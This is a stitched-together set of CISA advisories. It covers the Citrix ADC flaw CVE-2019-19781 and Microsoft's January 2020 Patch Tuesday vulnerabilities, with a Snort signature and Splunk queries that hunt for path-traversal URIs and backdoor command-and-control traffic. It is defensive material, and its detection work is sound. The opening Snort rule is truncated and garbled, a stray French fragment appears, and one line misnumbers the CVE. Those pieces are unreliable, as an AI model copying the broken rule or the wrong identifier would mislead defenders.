alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7;
content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0;
content:"|0d0a|Connection: Keep-Alive";
3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,; sid:201919781; rev:1;)

Suspicious Network Traffic

Context: Network Hunt

Type: Methodology

From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics.

Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).

Inbound Exploitation Activity (Suspicious URIs)

index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml

Outbound Traffic Search (Backdoor C2)

index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>
| stats count by src dest dest_port
| sort -count

The following resources provide additional detection measures.

  • Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[6] The tool aids customers with detecting potential IOCs based on known attacks and exploits.
  • The National Security Agency released a Cybersecurity Advisory on CVE-2020-19781 with additional detection measures.[7]
  • CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[8]


CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds before
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).


The resources provided include steps for standalone, HA pairs, and clustered Citrix instances.

Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.

CISA’s Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies.



  • January 31, 2020: Initial Version

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Original release date: January 20, 2020


On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0 to address CVE-2019-19781. Citrix expects to release updates for other vulnerable versions of Citrix ADC, Gateway, and SD-WAN WANOP appliances through January 24, 2020. (See Mitigations for update schedule).[1]

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[2] This vulnerability has been detected in exploits in the wild.[3]

The Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible once the appropriate firmware update becomes available.

Timeline of Specific Events

  • December 17, 2019 – Citrix releases Security Bulletin CTX267027 with mitigations steps.
  • January 8, 2020 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, [4] and CISA releases a Current Activity entry.[5]
  • January 10, 2020 – The National Security Agency (NSA) releases a Cybersecurity Advisory on CVE-2019-19781.[6]
  • January 11, 2020 – Citrix releases blog post on CVE-2019-19781 with timeline for fixes.[7]
  • January 13, 2020 – CISA releases a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[8] 
  • January 16, 2020 – Citrix announces that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
  • January 19, 2020 – Citrix releases firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[9]
  • January 24, 2020 – Citrix expects to release firmware updates for Citrix ADC and Citrix Gateway versions 10.5, 12.1, and 13.0 and Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.

Technical Details


On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds
  • Citrix SD-WAN WANOP firmware and appliance models 4000, 4100, 5000, and 5100 – all supported builds. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

CISA has released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[10] CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

See the National Security Agency’s Cybersecurity Advisory on CVE-2020-19781 for other detection measures.[11]


CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC and Citrix Gateway.

Until the appropriate update is accessible, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.[12] Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[13]

Refer to table 1 for Citrix’s planned fix schedule.[14]

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance Firmware Update Release Date
Citrix ADC and Citrix Gateway version 10.5 Refresh Build 10.5.70.x January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 11.1 Refresh Build January 19, 2020
Citrix ADC and Citrix Gateway version 12.0 Refresh Build January 19, 2020
Citrix ADC and Citrix Gateway version 12.1 Refresh Build 12.1.55.x January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 13.0 Refresh Build 13.0.47.x January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 10.2.6 Citrix ADC Release January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 11.0.3 Citrix ADC Release January 24, 2020 (Expected)


Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”



  • January 20, 2020: Initial Version

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Source de l’article sur

Original release date: January 14, 2020


New vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.

On January 14, 2020, Microsoft released software fixes to address 49 vulnerabilities as part of their monthly Patch Tuesday announcement. Among the vulnerabilities patched were critical weaknesses in Windows CryptoAPI, Windows Remote Desktop Gateway (RD Gateway), and Windows Remote Desktop Client. An attacker could remotely exploit these vulnerabilities to decrypt, modify, or inject data on user connections:

  • CryptoAPI spoofing vulnerability – CVE-2020-0601: This vulnerability affects all machines running 32- or 64-bit Windows 10 operating systems, including Windows Server versions 2016 and 2019. This vulnerability allows Elliptic Curve Cryptography (ECC) certificate validation to bypass the trust store, enabling unwanted or malicious software to masquerade as authentically signed by a trusted or trustworthy organization. This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.
  • Windows RD Gateway and Windows Remote Desktop Client vulnerabilities – CVE-2020-0609, CVE-2020-0610, and CVE-2020-0611: These vulnerabilities affect Windows Server 2012 and newer. In addition, CVE-2020-0611 affects Windows 7 and newer. These vulnerabilities—in the Windows Remote Desktop Client and RD Gateway Server—allow for remote code execution, where arbitrary code could be run freely. The server vulnerabilities do not require authentication or user interaction and can be exploited by a specially crafted request. The client vulnerability can be exploited by convincing a user to connect to a malicious server.

The Cybersecurity and Infrastructure Security Agency (CISA) is unaware of active exploitation of these vulnerabilities. However, because patches have been publicly released, the underlying vulnerabilities can be reverse-engineered to create exploits that target unpatched systems.

CISA strongly recommends organizations install these critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected information technology/operational technology (IT/OT) assets.

Technical Details

CryptoAPI Spoofing Vulnerability – CVE-2020-0601

A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates ECC certificates.

According to Microsoft, “an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.” Additionally, “a successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.”[1]

A cyber attacker could exploit CVE-2020-0601 to obtain sensitive information, such as financial information, or run malware on a targeted system; for example:

  • A maliciously crafted certificate could appear to be issued for a hostname that did not authorize it, preventing a browser that relies on Windows CryptoAPI from validating its authenticity and issuing warnings. If the certificate impersonates a user’s bank website, their financial information could be exposed.
  • Signed malware can bypass protections (e.g., antivirus) that only run applications with valid signatures. Malicious files, emails, and executables can appear legitimate to unpatched users.

The Microsoft Security Advisory for CVE-2020-0601 addresses this vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates.

Detection Measures

The National Security Agency (NSA) provides detection measures for CVE-2020-0601 in their Cybersecurity Advisory: Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers.[2]

Windows RD Gateway Vulnerabilities – CVE-2020-0609/CVE-2020-0610

According to Microsoft, “A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction.”[3],[4]


  • Affects all supported Windows Server versions (Server 2012 and newer; support for Server 2008 ends January 14, 2020);
  • Occurs pre-authentication; and
  • Requires no user interaction to perform.

The Microsoft Security Advisories for CVE-2020-0609 and CVE-2020-0610 address these vulnerabilities.

Windows Remote Desktop Client Vulnerability – CVE-2020-0611

According to Microsoft, “A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client.”[5]

CVE-2020-0611 requires the user to connect to a malicious server via social engineering, Domain Name Server (DNS) poisoning, a man-in the-middle attack, or by the attacker compromising a legitimate server.

The Microsoft Security Advisory for CVE-2020-0611 addresses this vulnerability.



A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

  • Temporary or permanent loss of sensitive or proprietary information,
  • Disruption to regular operations,
  • Financial losses relating to restoring systems and files, and
  • Potential harm to an organization’s reputation.



CISA strongly recommends organizations read the Microsoft January 2020 Release Notes page for more information and apply critical patches as soon as possible—prioritize patching by starting with mission critical systems, internet-facing systems, and networked servers. Organizations should then prioritize patching other affected IT/OT assets.

General Guidance

  • Review Guide to Enterprise Patch Management Technologies, NIST Special Publication 800-40 Revision 3. Patch management is the process for identifying, acquiring, installing, and verifying patches for products and systems. This publication is designed to assist organizations in understanding the basics of enterprise patch management technologies. It explains the importance of patch management and examines the challenges inherent in performing patch management. It provides an overview of enterprise patch management technologies, and also briefly discusses metrics for measuring the technologies’ effectiveness.
  • Review CISA Insights publications. Informed by U.S. cyber intelligence and real-world events, each CISA Insight provides background information on particular cyber threats and the vulnerabilities they exploit, as well as a ready-made set of mitigation activities that non-federal partners can implement. Printable materials can be found by visiting:
  • Review CISA’s Cyber Essentials. CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices. Essentials are the starting point to cyber readiness. To download the guide, visit:



  • January 14, 2020: Initial version
  • January 14, 2020: Minor technical edits

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